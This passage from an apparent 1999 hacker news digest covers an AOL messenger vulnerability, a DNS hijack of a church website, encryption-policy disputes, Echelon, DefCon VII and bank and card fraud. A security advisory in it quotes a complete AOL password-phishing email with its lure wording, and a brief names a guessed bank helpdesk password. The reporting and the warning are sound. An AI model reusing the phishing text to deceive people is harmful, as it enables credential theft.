The downside is that we may lose out on what has turned into a $1.5 billion
cryptography business for Canada, where limits are less strict, Hill says.

The U.S. approach could backfire and result in a brain drain of encryption
experts, EPIC's Sobel said.

"The end result will be that American companies will lose leadership in this
field," he said, "and it is not going to result in encryption being out of the
hands of anyone our government might be concerned about."

@HWA

48.0 Is AOL hacking IM users?
~~~~~~~~~~~~~~~~~~~~~~~~

Contributed by D----Y;

http://www.zdnet.com/filters/printerfriendly/0,6061,2316917-2,00.html

--------------------------------------------------------------
This story was printed from ZDNN,
located at http://www.zdnet.com/zdnn.
--------------------------------------------------------------

Is AOL hacking IM users?
By David Raikow, Sm@rt Reseller
August 18, 1999 3:04 PM PT
URL: http://www.zdnet.com/zdnn/stories/news/0,4586,2316917,00.html

As the Instant Messaging war rages on, evidence is mounting that suggests America Online Inc. is
using a security hole in its own software to lock out IM clones.

While security experts are still examining IM logs to determine precisely what is going on, it looks
like AOL's tactics may have put its own users at serious risk.

The first hint of a problem came last Wednesday, when an individual identifying himself as "Phil
Bucking" of "Bucking Consulting" sent an e-mail to PharLap Software President Richard Smith
warning of a "buffer overflow" vulnerability in the AOL IM client. Smith, a noted security expert,
quickly determined that the e-mail had been falsified, and had almost certainly come from within
Microsoft. Microsoft has flip-flopped on whether or not the e-mail message actually came from
one it its employees.

Because of the identity question, the allegations of "Mr. Bucking" initially garnered little serious
attention. On Monday, however, Robert Graham, chief technical officer with Network Ice
Software, a software security firm, released a detailed analysis of the AOL IM logon procedure,
which suggests a vulnerability almost identical to that described by "Bucking".

A very serious threat
The security community is now taking the threat very seriously.

"Buffer overflow" vulnerabilities allow an intruder to trick a susceptible machine into executing
code by sending it more information than it is configured to receive. These attacks require a great
deal of technical knowledge to develop, but are often automated with script tools and used to
compromise network servers by skilled hackers and "script kiddies" alike.

While emphasizing that the evidence is still preliminary, PharLap's Smith said he believes that AOL
has been using this technique to trigger specific responses from its IM clients. Because Microsoft's
IM clients do not have this bug, AOL servers can identify them, and lock them out of the system.
This bug has only been observed on Windows clients; it is not clear how other platforms are
affected.

Smith said he sees this as a very serious potential threat to users. As Microsoft continually updates
its clients, AOL must keep introducing new variations on the buffer overflow to stay ahead.

"It's only a matter of time before they make a mistake, and machines running AOL IM start
crashing all over the Net," Smith predicts.

Smith added that the hole gives AOL an extraordinary amount of power over users' machines.
"Remember that this is a technique normally used by hackers to break into machines. The current
use seems pretty benign, but AOL can use this to execute any arbitrary code on a Windows
machine -- run software, leave backdoors, whatever. What happens if a disgruntled AOL
employee finds a use for this?" Smith warned.

Larger potential danger
Graham said he concurs with Smith's assessment, though he sees an even larger potential danger:

"If hackers managed to masquerade as an AOL server, they could do anything to the target
machine. This could be a real problem for cable modem and DSL users, who have 24-hour
connections and are vulnerable to 'man-in-the-middle' attacks."

Graham noted that such attacks are unlikely in the near future because of the technical expertise
required, but are a very real possibility.

AOL did not respond to requests for comment on these latest charges by press time.

@HWA

49.0 Anti-gay site is hacked
~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by deepquest
In what appears to be a simple internic spoof the
registration information for godhatesfags.com was
changed to the owner of godlovesfags.com. It is
unknown if the first domain became unregistered or if
the perpetrator somehow fooled Network Solutions into
changing the information. Unfortunately it does not
appear that anyone who has written a 'news' article
about this has any idea how the internet works, making
it hard to determine exactly what happened.


Hackers reverse message on
anti-gay Web site

August 19, 1999
Web posted at: 5:22 p.m. EDT (2122 GMT)

By Robin Lloyd
CNN Interactive Senior Writer

(CNN) -- Hackers switched the
message from hate to love on a
notorious anti-gay site on the
Internet.

A 2-year-old Web site
www.godhatesfags.com put up by
Pastor Fred Phelps' Westboro
Baptist Church in Topeka, Kansas,
was hacked Wednesday to re-route
visitors to www.godlovesfags.com,
featuring a pink and purple pro-gay banner, links to gay news Web sites and
a quote from Ellen DeGeneres.

"Hate will not be tolerated on the Internet," said Kris Haight on Thursday.
Haight says he registered the domain name for the pro-gay site more than a
year ago and gave the OK for the re-routing within the past two days.

"Phelps teaches hate and a lot of it is untrue.
People who go to their site and want to find hate
aren't going to find it, at least until he gets the
domain back."

The pro-gay site, usually visited daily by only a
handful of people, got 8,000 hits in the past 24
hours, Haight said. The pages were written by
Rich Macky of Omaha, Nebraska, Haight said.
The switch did not show up on all computers
Thursday as it takes time for the re-routing to
take effect on servers worldwide.

Phelps' daughter, Shirley Phelps-Roper, said the hack is just one of more
than a dozen tricks played on the church's Web site in the past two years.

"No, my dear, it's not all that drastic," she told CNN Interactive. "It's just
another fag ploy to try to bury the truth of God and the Earth. It's a
temporary inconvenience."

Phelps-Roper, who also serves as the church's attorney, said it would take a
couple days of paperwork on her end to correct the re-routing.

Fred Phelps, whose congregation regularly engages in anti-homosexual
picketing, demonstrated at the funeral of Matthew Shepard, a 21-year-old
gay man who was savagely beaten to death in a Wyoming hate crime.

Hacker hit DNS

Haight said he didn't know who originated the hack, which involves
re-routing godhatesfags.com visitors via the Domain Name System, a
network of servers which translates alphabetic domain names into numeric
IP, or Internet Protocol, addresses.

Haight, a 22-year-old gay man living in Newport, New Hampshire, said he
registered the pro-gay domain name a year or so ago when he found out
about Phelps site, which he says he found disgusting.

He recently received an anonymous e-mail advising him to watch the Internet
contact information for his site.

Wednesday, Haight got a chance to change that information. "I set up the
server to point godhatesfags to godlovesfags," he said.

Later, he received another e-mail saying the address swap worked.

Haight is part of a group of Internet denizens known as Mindsprung, a play
on the popular Internet service provider Mindspring. Haight owns domain
names for a couple other Web sites, including www.gaycollegeboys.com, an
IRC chat discussion page.

Phelps-Roper said the 100-member church has been forced to switch
servers a few times due to all the digital attacks on the site. The church
sponsors another Web site -- godhatesamerica.com.

"We're busy people, not thwarted or detracted by one more assault on our
ministry," she said. "It's like 'ho hum.'"

@HWA


50.0 Indonesian CyberWar? Or Not?
~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Space Rogue
On Wednesday Nobel Peace Prize laureate Jose
Ramos-Horta claimed that hundreds of people around
the world were poised to launch a cyber attack against
Indonesia should there be any tampering in the election
process for East Timor's freedom.

Yesterday HNN cast grave doubts on this claim having
seen absolutely no evidence to support it.

Connect Ireland, the ISP that hosts the virtual top level
domain of .tp for East Timor has released a press
release also saying that they have not seen nor heard
of any preparations for any electronic retaliation. C-I
also urges all people to leave the internet for
communication and not to attack other peoples freedom
of speech via the internet.

San Jose Mercury News - Story on Jose Ramos-Horta's statements
http://www7.mercurycenter.com/premium/world/docs/cyberwar19.htm
HNN Archive for August 19, 1999
http://www.hackernews.com/archive/arch.html?081999#2
Press Release from Connect Ireland
http://www.hackernews.com/orig/conire.html

Press Release - from Connect - Ireland
Communications Ltd. 4.30pm GMT,
Thursday 19th August 1999, Dublin.

Connect-Ireland's response to the call for
Cyber War against Indonesia.

In a number of recent international newspapers, articles
have appeared quoting Ramos Horta in the context of the
threat of the use of cyberwarfare against Indonesia.

There are some points I would like to make to correct
some of the content in these articles. The attack on us -
which was a culmination of attacks over 9/10 months was
NOT directed at a web site - but at the cctld - top level
domain - for East Timor (.tp) - and therefore much more
serious than stated..

During the course of the attack, we established that the
perpetrators had a full domain registry with them and were
endeavouring to establish spurious domains - which we
can but assume were for neferious purposes and
presumably these would reflect badly on the Call for
Freedom by the East Timorese.

Our activities and initiatives have established East Timor's
virtual independence, at least as far as the Internet is
concerned.

After the attack we received many positive offers of
support and assistance. The offers also included possible
revenge attacks against Indonesia - which we stated
categorically that we did not want or condone.

We have not heard from anyone in the current call for
such action by Ramos Horta either in the Irish Internet
community or any other location. If we had heard of such
a potential action, C-I would have endeavoured to
dissuade the use of such options and activities and
hopefully would have directed the interest and intellectual
capacity to more fruitful channels.

I would like to make our position extremely clear.

We do not condone attacks of any kind on the Internet or
other similar technologies. We believe in the freedom of
speech and in everyone's ability to conduct their
communication for their own legitimate purposes. We (C-I)
believe there is more to be gained by maintaining the
opportunities that can be developed through free speech
than in conducting cyberwarfare.

I would also like to add that after the attack on us, we
received support from many Indonesians - who translated
our statement(s) into the many languages that are used
within that territory and circulated these widely.

We (C-I) are NOT at war with the Indonesian People.

We were completely unaware of the proposed activity as
given by Horta.

We have not been approached in recent months by
anyone who has stated that they wished to participate in
an activity of this nature. The response that we received
after the attack from the 'hacker' cyber community was all
very anti cyber terrorism.

Since the beginning of this year, we have been informed
on good authority that over 5000 East Timoreans have
been killed. In this light, I can perceive that leading
activists in the cause for East Timor are under
considerable pressure and this will continue until the
implementation of full and open democratic processes are
in place in East Timor.

To my mind Ghandi would have made a much better
Internet strategist than Hitler. Connect-Ireland believes in
the freedom of speech. We believe that all lines of
communication should always be kept open as there is
more to gain through this process.

I can think of no better environment for managing "Jaw-
Jaw rather than War-War" - than the Internet.

Martin Maguire
Project Director
Connect-Ireland Communications Ltd.
19th August 1999
Connect-Ireland Communications Ltd.,
20 Mark St.,
Dublin 2
Tel:+353-1-6706701 Fax:+353-1-6790089
Mob.+353-86-UCALLME
URL: http://www.connect.ie
-Internet for Everyone-

51.0 Gov Wants to Break Into to Personal Computers, Legally
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/


contributed by AlienPlague
A proposed 'Cyberspace Electronic Security Act,' would
give the DoJ additional powers to break into personal
computers. The DoJ memo dated August 4, would allow
the government to disable encryption on the machines
and to gather passwords.

Washington Post
http://www.washingtonpost.com/wp-srv/business/daily/aug99/encryption20.htm
CNN
http://www.cnn.com/TECH/computing/9908/20/computer.codes.ap/index.html
Yahoo News
http://dailynews.yahoo.com/h/nm/19990820/ts/technology_covert_2.html

Justice Department Mulls Covert-Action Bill

By Robert O’Harrow Jr.
Washington Post Staff Writer
Friday, August 20, 1999; Page A1

The Justice Department wants to make it easier for law enforcement
authorities to obtain search warrants to secretly enter suspects' homes or
offices and disable security on personal computers as a prelude to a
wiretap or further search, according to documents and interviews with
Clinton administration officials.

In a request set to go to Capitol Hill, Justice officials will ask lawmakers to
authorize covert action in response to the growing use of software
programs that encrypt, or scramble, computer files, making them
inaccessible to anyone who does not have a special code or "key,"
according to an Aug. 4 memo by the department that describes the plan.

Justice officials worry that such software "is increasingly used as a means
to facilitate criminal activity, such as drug trafficking, terrorism,
white-collar crime, and the distribution of child pornography," according
to the memo, which has been reviewed by the Office of Management and
Budget and other agencies.

Legislation drafted by the department, called the Cyberspace Electronic
Security Act, would enable investigators to get a sealed warrant signed by
a judge permitting them to enter private property, search through
computers for passwords and install devices that override encryption
programs, the Justice memo shows.

The law would expand existing search warrant powers to allow agents to
penetrate personal computers for the purpose of disabling encryption. To
extract information from the computer, agents would still be required to
get additional authorization from a court.

The proposal is the latest twist in an intense, years-long debate between
the government and computer users who want to protect their privacy by
encrypting documents.

Although Justice officials say their proposal is "consistent with
constitutional principles," the idea has alarmed civil libertarians and
members of Congress.

"They have taken the cyberspace issue and are using it as justification for
invading the home," said James Dempsey, senior staff counsel at the
Center for Democracy and Technology, an advocacy group in the District
that tracks privacy issues.

Police rarely use covert entry to pave the way for electronic surveillance.
For example, federal law enforcement agencies obtained court approval
just 34 times last year under eavesdropping statutes to install
microphones, according to the 1998 wiretap report issued by the
Administrative Office of the Unites States Courts.

David L. Sobel, general counsel at the Electronic Privacy Information
Center, predicted the number of secret break-ins by police would soar if
the proposal is adopted because personal computers offer such a
tantalizing source of evidence for investigators -- including memos, diaries,
e-mail, bank records and a wealth of other data.

"Traditionally, the concept of 'black bag' jobs, or surreptitious entries,
have been reserved for foreign intelligence," Sobel said. "Do we really
want to alter the standard for physical entry?"

The proposal follows unsuccessful efforts by FBI Director Louis J. Freeh
and other Justice officials to secure laws requiring computers or software
to include "back doors" that would enable investigators to sidestep
encryption.

Those proposals, most notably one called Clipper Chip, have been
criticized by civil libertarians and have received little support in Congress.

In a snub of the administration, more than 250 members of Congress have
co-sponsored legislation that would prohibit the government from
mandating "back doors" into computer systems.

"We want to help law enforcement deal with the new technologies. But we
want to do it in ways that protect the privacy rights of law-abiding
citizens," said Rep. Robert W. Goodlatte (R-Va.), who originally
sponsored the legislation, known as the Security and Freedom Through
Encryption Act. Goodlatte said the Justice Department's proposal might
upset the "very finely tuned balance" between law enforcement power and
civil liberties.

But Justice Department officials say there is an increasingly urgent need for
FBI agents and other federal investigators to get around encryption and
other security programs.

"We've already begun to encounter [encryption's] harmful effects," said
Justice spokeswoman Gretchen Michael. "What we've seen to date is just
the tip of the iceberg."

The proposed law also would clarify how state and federal authorities can
seek court orders to obtain software encryption "keys" that suspects might
give to others for safekeeping. Although few people share such keys now,
officials anticipate that they will do so more often in the future.

Administration officials played down the potential impact on civil liberties.
In interviews, two officials said the law would actually bolster privacy
protections by spelling out the requirements for court oversight of
cyber-surveillance and the limits on how information obtained in a search
could be used.

"The administration is supportive of encryption. Encryption is a way to
provide privacy, but it has to be implemented in a way that's consistent
with other values, such as law enforcement," said Peter P. Swire, the chief
White House counselor for privacy. "In this whole debate, we have to
strike the right balance."

Computer specialists predict that people under investigation will take
countermeasures.

"It's 'Spy vs. Spy,' " said Lance Hoffman, director of the Cyberspace
Policy Institute at George Washington University, who praised the
administration for raising the issue but expressed skepticism about the
proposal as it was described to him.

"I'd be leery if I were the government. . . . They have to be real careful,"
he said.

© 1999 The Washington Post Company

-=-

CNN;

Feds want authority to
secretly crack personal
computer codes

August 20, 1999
Web posted at: 12:49 a.m. EDT (0449 GMT)

WASHINGTON (AP) -- The Clinton
administration reportedly plans to ask
Congress to give police authority to
secretly go into people's personal

  
computers and crack their security
codes.

Legislation drafted by the Justice Department would let investigators get a
sealed warrant from a judge to enter private property, search through
computers for passwords and override encryption programs, The
Washington Post reported Friday.

The newspaper quoted an August 4 department memo that said encryption
software for scrambling computer files "is increasingly used as a means to
facilitate criminal activity, such as drug trafficking, terrorism, white-collar
crime and the distribution of child pornography."

Under the measure, investigators would obtain sealed search warrants
signed by a judge as a prelude to getting further court permission to wiretap,
extract information from computers or conduct further searches.

Privacy advocates have objected to the plan, dubbed the Cyberspace
Electronic Security Act by the Justice Department. "They have taken the
cyberspace issues and are using it as justification for invading the home,"
James Dempsey, an attorney for the Center for Democracy and Technology,
told the Post.

Peter Swire, the White House's chief counselor for privacy, told the
newspaper the administration supports encryption as a way to provide
privacy for computer users.

"But it has to be implemented in a way that's consistent with other values,
such as law enforcement," Swire said. "In this whole issue we have to strike
the right balance."

The administration has for years been seeking a law to require computer
makers to include a so-called Clipper Chip in their products that would give
police a "back door" into computers despite any encryption software they
may contain.

In a backlash, more than 250 members of Congress have signed on as
co-sponsors to legislation that would prohibit mandating such back-door
devices on computers.

Copyright 1999 The Associated Press. All rights reserved.

52.0 Hearings to be Held on Echelon
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Weld Pond
The House Government Reform and Oversight Committee
will hold hearings on such surveillance programs as the
National Security Agency's "Project Echelon," the NSA's
global eavesdropping network. Earlier this year
committee Chairman Dan Burton (R-IN) amended the FY
2000 Foreign Intelligence Authorization Act to require
the DoJ, the NSA, and the CIA to submit to Congress a
report detailing the legal standards the agencies use
when they eavesdrop on American citizens.

US House of Representatives
http://www.house.gov/barr/p_081699.html

53.0 AOL Password Scam Uncovered
~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Webmaster
The Shadow Knights Security Corp. has released an
advisory that details a new scam that they have
discovered that attempt to steal AOL users passwords.
Basically an email is sent to the user which directs them
to a fake AOL NetMail page where they are prompted to
enter their username and password to read unread mail.

The Shadow Knights Security Corp
http://www.ShadowGovt.net/Texts/aolscam2.html



Brief written by - - The Phantom x^\|/^x

http://angelfire.com/oh3/preview/ ::mirror:: http://www.ShadowGovt.net/aolscam/

The above link is from a scam e-mail that has been sent to who knows how many AOL members. This time the setup is
even more elaborate than the site our last advisory was about. Our last advisory is similar to this one however, we feel the
need to reiterate our position.

Why a scam works:
This scam setup and procedure is similar to all most AOL password scams, however, someone spent time on this one.
AOL users tend to not be familiar with the 'real' Internet. This is not saying AOL users (in general) are not as smart as other
ISP users, however, AOL users do lead a sheltered internet existence. A built in browsers, their own chat rooms, their own
'Instant Messages', even your own AOL buddy list. AOL is a great ISP for those who are beginning net users and for those
who wish to venture out, start leaving that AOL window and go out and find things on your own. Being this enclosed leaves
AOL users to communicate only with other AOLers and less with the other ISP users. Research done previously by TSK
Security Corp. suggest that 86% of AOL users who received this e-mail will visit the site; 62% of AOL users who received
this e-mail will give their password and logon to the site

The setup:
AOL security breaches are more often then not, attempted using our good friend Social Engineering. I received the e-mail
via BCC from MAIL36@aol.com. The scam includes a subject of 'AOL NetMail 2.0' and the body contains claims of:
'We have noticed that you have not been using America Online NetMail.
You currently have: [5] unread message(s)'

The body of message also includes details that 'Many times urgent messages are sent to NetMail, due to
confidentiality, or privacy.' Upon visiting the page you see what looks like the AOL NetMail page however, on this page
is an Angelfire banner. Note: Angelfire is not owned by AOL and you should never trust an internet site UNLESS it is on
the relevant domain (AOL.com).
Example: If you are told to visit the new Hacker News Network (hackernews.com) and the link sends you to an Angelfire
or Tripod account DON'T BELIEVE THAT YOU ARE AT HackerNews.com .

These scams will only continue if ignorance seems never to subdue. Please, if you are an AOL user (like myself) never,
ever, EVER giveaway your account information to an unauthorized source. AOL Staff will NEVER ask for your password
to your Logon account. Below is the exact text of the scam e-mail (A).

I have checked out the supposed links above and they look to be from a free CGI Scripting Service. If you do receive this
scam or similar scam e-mail, forward all the scam e-mails to TOSEMail1@aol.com .

Webmaster@ShadowGovt.net -
TSK Security Corporation - http://www.ShadowGovt.net
KnightNews Network - http://www.HackerNews.net

(A).
"Dear Member

AOL NetMail 2.0

We have noticed that you have not been using America Online NetMail.
You currently have: [5] unread message(s)
To check your E-Mail please goto: Netmail Preview (http://angelfire.com/oh3/preview/)
Many times urgent messages are sent to NetMail, due to confidentiality, or privacy.

For more information please Email
AOLNetMail@AOL.Com

Thank you

Mike Bowers
AOL NetMail 2.0

©1999 America Online"

@HWA

54.0 Bronc's Defcon VII Review
~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/


contributed by Bronc Buster
The Synthesis has finnally posted a review of Defcon
VII, that was in their last print issue, onto their web
site. The review is authored by someone you might
know, Bronc Buster.

The Synthesis
http://www.thesynthesis.com/tech/defcon/vii.html

DefCon 7
Hackerz, Phreakerz and Fedz: Three Days of Fear and Loathing in Las Vegas
By Bronc Buster



We flew into Las Vegas on Wednesday, hoping to get to check out the hotels and casinos on the strip before it all started. How were we to know the
worst floods in Las Vegas history would happen, and that we would be told to stay in our hotel rooms for our own safety? What a beginning to a
long five days, and another weird kick off for another installment of DefCon. This was DefCon 7, the annual hacker convention that happens every
year in Las Vegas.

Everyone comes to DefCon: Teams from Microsoft and Intel, Federal Agents, elite underground figures, a huge number of hackers and phreakers,
and even high school kids who must have ran away to come, because they look far too young to be in the city of sin by themselves. They come from
all over the world: from Australia, Kuwait, Europe, South America, you name it. So for those of you not familiar with DefCon, you are asking yourself
what would bring all these people—well over 3000 by some estimates—to the Alexis Park Hotel for this three-day event. Well, ask each different
person and you will get a different answer.

DefCon had three different speaking tracks this year, ranging from newbie to advanced topics, like how to take over PBX phone systems, to a simple
introduction to TCP/IP, which is the protocol the Internet uses to function the way it does. Now, on the surface it may sound like a normal
convention just like any other, but once you get there, you notice some strange things happening.

There were vendors selling everything from very real-looking fake IDs to books, old
computer hardware and military computer equipment, T-shirts and CDs with alternate
operating systems, like FreeBSD and Linux. There was a scavenger hunt, in which the
items to be collected included everything from a satellite dish off the top of a famous
casino, to a menu from a local restaurant. They had "hacker death matches" in huge,
inflatable sumo outfits, that paired off people who may hate each other online, but have
never seen each other in real life. Popular yearly games are played, like Hacker Jeopardy,
in which teams of hackers get onstage in a game of Jeopardy to see who knows the most,
with the losers having to drink large amounts of beer. The l0pht (pronounced Loft) also
holds a TCP/IP drinking game, where people shoot it out on stage to see who knows the
most about the complex inner-workings of the net, with the losers having to drink large
amounts of beer. Another popular game that goes on throughout the entire convention is "Spot the Fed." This is where normal con goers try to pick
out the feds who might be in the crowd mingling. It’s all in good fun, and if spotted, they are brought on stage, asked to show their ID, and then
given a round of applause and T-shirt saying "I am a Fed."

As the years roll by and DefCon gets larger and larger, it attracts more and more people. This was apparent in how serious the U.S. Government is
taking it, this year hosting its own panel where people could ask questions to agents from the National Security Counsel, the White House and the
NSA. More apparent were the masses of media people who showed up. More than 300 press passes were given out, and there were over 20 film
crews on hand, from CNN to Z-Net, and TV stations from all over the world. Needless to say, it is almost unbelievable seeing it go from what it was 7
years ago—when it was a gathering of a few hundred people run by a group of friends who had the wild idea to get together to have to fun in Las
Vegas—to what it is today.

One of this year’s highlights included a presentation from a group called the Cult of the Dead Cow, or cDc for short, who released an updated
version of their remote administration tool called Back Orifice 2000 (BO2K). In addition to its legitimate use—remotely administrating
networks—critics say it can also take over other people’s computers over the Internet if someone were to be duped into installing it onto their
system. BO2K has the ability to take over the mouse and keyboard of a victim’s computer, and in addition to logging everything a person might
type, it can provide a video feed in real time, so one can watch what the victim’s computer is doing, what is being clicked on, and what is being seen.
Similar to last year’s presentation (when the group announced their original Back Orifice tool), this year the cDc made a grand entrance with strobe
lights, loud techno music and spinning cow skulls on the walls. It was standing room only for their almost two-hour presentation.

Another highlight, and always a favorite, was Capture the Flag. Now, this is not the game
you played when you were a kid, this is Capture the Flag, hacker-style. People set up
target boxes and put them on a network in one of the convention rooms, while other
people hook up their laptops and try to break into them to plant their group’s "flag."
These boxes vary in types and operating systems, and they are not your run of the mill
systems, either. The owners secure them and try to make it a difficult task for people to
get on. This year, a group calling itself the "Ghetto Hacker" took first prize by getting
onto the most boxes and defending them from other groups who were hard at work trying
to follow them.

As you can no doubt imagine, as much play as serious work goes on at this con, which is why people say that is it so popular. The parties go on
long into the night, and the speakers do not start until noon or so, then fade into the games, which last until midnight or longer. The Alexis Park was
kind enough to stock Jolt Cola for the con-goers to help keep them going, and the Dis.Org Crew (the DOC) brewed, and then gave away case after
case of caffeinated beer to also help keep the parties going strong.

Now, you may be getting the idea that DefCon is nothing more then a three-day long party, but that’s only part of it. The convention features
speakers on a variety of topics: this year, there were federal agents talking about legal matters and what the government is planning on doing for the
future of the Internet; lawyers talking about rights and how they relate to the Internet; people talking about various security problems with different
systems and software; investigators talking about online forensics and intruder-detection systems; reporters talking about what it is like reporting
on the hacking underground, and much, much more.

In the past, DefCon was looked on as a freak show of sorts, where people with multiple body piercing and colored hair were the norm. Now, as it
grows, it almost looks as if this year that was the exception rather then the rule. More women are showing up, as well as people from all ethnic
backgrounds, and more people are in their late 20s now (like me), rather then the pale youngsters of past conventions. The only thing that has
remained from the days of yore is the party attitude.

As you can imagine, not everything goes according to plan when you get over 3000
people with a lot of technical skills and a lot of beer in one place. The lights and climate
controls were messed with more than once, and the radio channels the hotel security used
had to be changed several times as well because their channels were being taken over by
short wave radios that many people were carrying on their belts. Other classic pranks
were pulled as well: soap was poured into the hotel fountain, beer bottles were left
floating in the pool, and streakers ran through the con from time to time (men and women).
After the first day, the hotel had to double its security, but as with most hotels that have
hosted DefCon in the past, it was not ready for what came with the con. On Saturday,
some poor couple got married and had their reception at the Alexis Hotel; they were
surrounded by freaky people con-goers and left shortly after their party arrived.

The con’s organizer, Jeff Moss (who goes by the name Dark Tangent), was strangely absent this year for most of the con. In past years, Moss was
almost omnipresent, constantly up on stage with announcements and fixing problems that arise during the three-day con. In his absence, a large
fellow name Priest ran the con, and run it he did, with an iron hand. He was a cross between a Nazi SS trooper and a pro wrestler, throwing people
out on a whim and canceling presentations by people he didn’t like. If there was anything that could have made a fun three days turn bad, he was it.
Lucky for us con-goers, Moss would pop in from time to time and defuse things, which kept the con moving with only a few bumps.

The whole idea behind DefCon is to make a place where people can meet their friends and enemies, people they may only know online; where people
can learn and exchange ideas; where anyone can come and get a look inside the hacker underground and see that it’s not some dark, scary place
some reporters make it out to be, but rather a preview of the movers and shakers of the next century. These people are not trying to take over the
Internet, they are just trying to improve it and keep companies honest in their work and what they release.

Who knows, maybe if we’d had a DefCon 20 years ago, we would not be facing the Y2K problem now, because after all, the Internet is going to be
around for a long time, and these people who spend a large amount of their time online want nothing more than to see it improved.

Bronc Buster is a California-based hacker whose exploits have been featured in the LA Times.

@HWA

55.0 Y2K Survival Catalog
~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/


contributed by techs
Worried about Y2K? Fear the end of the world as we
know it? Afraid you might run out of breath mints?
Wonder how your going to generate random numbers
when the power fails? Get all of your Y2K survival needs
here.

Y2K Survival Catalog
http://www.brunching.com/features/feature-y2kcatalog.html

@HWA

56.0 BELGIAN BANK COMPROMISED
~~~~~~~~~~~~~~~~~~~~~~~~
From www.net-security.org

by Thejian, Friday 20th August 1999 on 3:00 am CET
DeCursor.com reports today that the hacker ReDaTtAcK, who only a few days ago
hacked the Belgian ISP Skynet, yesterday successfully intruded the
computersystems of the Generale Bank, the biggest bank in Belgium. Making use of
the banks' remote banking program and by guessing the helpdesk accounts' login
(helpdesk) and password (hlpdsk) he was able to bruteforce the user accounts on the
system and in doing so he claims to have access to account info, transactions and
login codes. The bank says it won't press charges and might even ask the hacker for
his assistance in fixing the problems.

@HWA

57.0 CARDING IN NEWCASTLE
~~~~~~~~~~~~~~~~~~~~
From www.net-security.org

by Thejian, Friday 20th August 1999 on 1:00 am CET
Thieves in Newcastle are using the Internet to buy goods, charging them to other
people's credit cards. Detectives have established how the thieves operates but are
unsure how they are obtaining details of other people's credit cards, a lot of the
victims never used the Internet to buy anything, so there is no reason why their credit
details are availble to third parties. Read the story

Net theft is on the cards

19aug99

THIEVES in Newcastle are using the Internet to buy goods, charging
them to other people's credit cards.

The scam has been used to buy property including $500 worth of
computer software and theatre tickets.

Detectives have established how the thieves operates but are unsure
how they are obtaining details of other people's credit cards.

"We are puzzled how he is finding out details of these people's
accounts," Detective Senior Constable Wayne Moulton said.

"A lot of these victims have never used the Internet to buy anything
so there is no reason why their credit details would be accessible."

Police said card numbers and names had been checked before the
goods were dispatched, but were found to be valid and were
processed by retailers.

Det Moulton said the goods were "sent to empty homes or places
where the people are away

@HWA

58.0 U.S.-British Cyber-Spy System Puts European Countries on Edge
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From: Zombie Cow <waste@zor.hut.fi>


http://www.latimes.com:80/excite/990816/t000072952.html


Monday, August 16, 1999
Digital Nation
U.S.-British Cyber-Spy System Puts European Countries on Edge
By GARY CHAPMAN


OVERETO, Italy--It felt like there was a new Cold War developing at a
conference here last week on computers, networks and international
security, only this time the adversaries are the United States and Europe
and the field of conflict is cyberspace.


The revelation last year about the collaborative electronic eavesdropping
system developed by the U.S. National Security Agency and British
intelligence agencies, a system known as Echelon, has become a huge topic
of discussion in Europe.


The Echelon system can and does intercept "all e-mail, telephone and fax
communications" in Europe, according to a report delivered last year to
the European Parliament, and further investigations revealed that this
capability also covers Australia, New Zealand and other countries.


The report's author, Steve Wright, director of Omega Foundation, a
British human rights group, was here last week and summarized his
investigation into Echelon.


"The Echelon system forms part of the U.K.-U.S.A. system but unlike many
of the electronic spy systems developed during the Cold War, Echelon is
designed for primarily nonmilitary targets: governments, organizations and
businesses in virtually every country," states Wright's report, "An
Appraisal of Technologies of Political Control," (available on the Web at
http://cryptome.org/stoa-atpc.htm).


The report was prepared for the European Parliament's Scientific and
Technological Options Assessment (STOA) group. Its release in early 1998
shocked European government leaders.


[snip..]


ISN is sponsored by Security-Focus.COM

@HWA

59.0 Watching the digital detectives.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

http://www.ft.com/hippocampus/q13c04e.htm

Life / Technology


SURVEILLANCE: Watching the digital detectives
Software that analyses video tape has brought total surveillance a step closer,
says Alan Stewart

The recent film Enemy of the State contains a chilling
account of what might happen when the security
services turn on an innocent man, unwittingly involved
in their affairs.

The film centres on an attempt to introduce a new law
allowing the US government access to the video
footage from surveillance cameras in shopping malls,
petrol stations and street corners. It soon becomes
clear, however, that the security services are already using video from those
sources.

Now, in the real world, a new software technology that can analyse and index
video is being introduced by Cable News Network (CNN) to help it keep its
competitive edge. Of obvious interest to television news companies, this
video-searching capability is also being used by security services on both
sides of the Atlantic.

"We take the incoming video signal, whether it's off a tape or satellite dish,
and extract what we call 'metadata' or index data," says Paul Lego, chief
executive of Virage, one of the suppliers of video search software (see
accompanying story). "We like to say we watch, read, and listen to the
video."

By 'watching' it, the software examines the frames of the video as they are
read in, and when the picture changes sufficiently, a time-stamped 'key-frame'
is stored in a database as metadata. If the video contains text (either teletext
or close-captioning), this is 'read' and also time-stamped.

The search software also 'listens' to the video, using an International Business
Machines speech-to-text system which identifies speakers from a library of
voices. "We can also, to a large degree, understand what they're saying - at
least, at the key-word level," explains Mr Lego. Transcription is not yet
perfect, but an accuracy of between 30 per cent (outdoors) and 90 per cent (in
a studio) is possible.

Users can search the database of metadata via the internet, by keying in the
name of a person and a topic. "You might get back five video clips," says Mr
Lego. "You can click on any of those and the software will cue to the point
where that subject is being talked about."

Mr Lego believes there is a huge government market for video analysis
software, with about a third of Virage's business already being for US
government agencies such as the FBI, CIA, Nasa, National Security Agency,
National Image Mapping Agency, and Joint Combat Camera Command.

The US Army and Air Force both use software from Islip Media, a rival video
analysis company whose other users include the Department of Energy's
Lawrence Livermore National Laboratory, and the National Institute of
Standards and Technology.

"The government watches every TV station in the world, looking for key
events," says Mr Lego, who likens it to a huge TV network for every channel in
the world, with an added requirement to analyse and translate languages. "In
addition, there's a lot of stuff they watch that isn't what you would call
broadcast television," he adds.

The UK counterparts of the US security agencies are also using the same
software to enable transatlantic trading of data.

For the past few months, meanwhile, CNN has been testing a new system
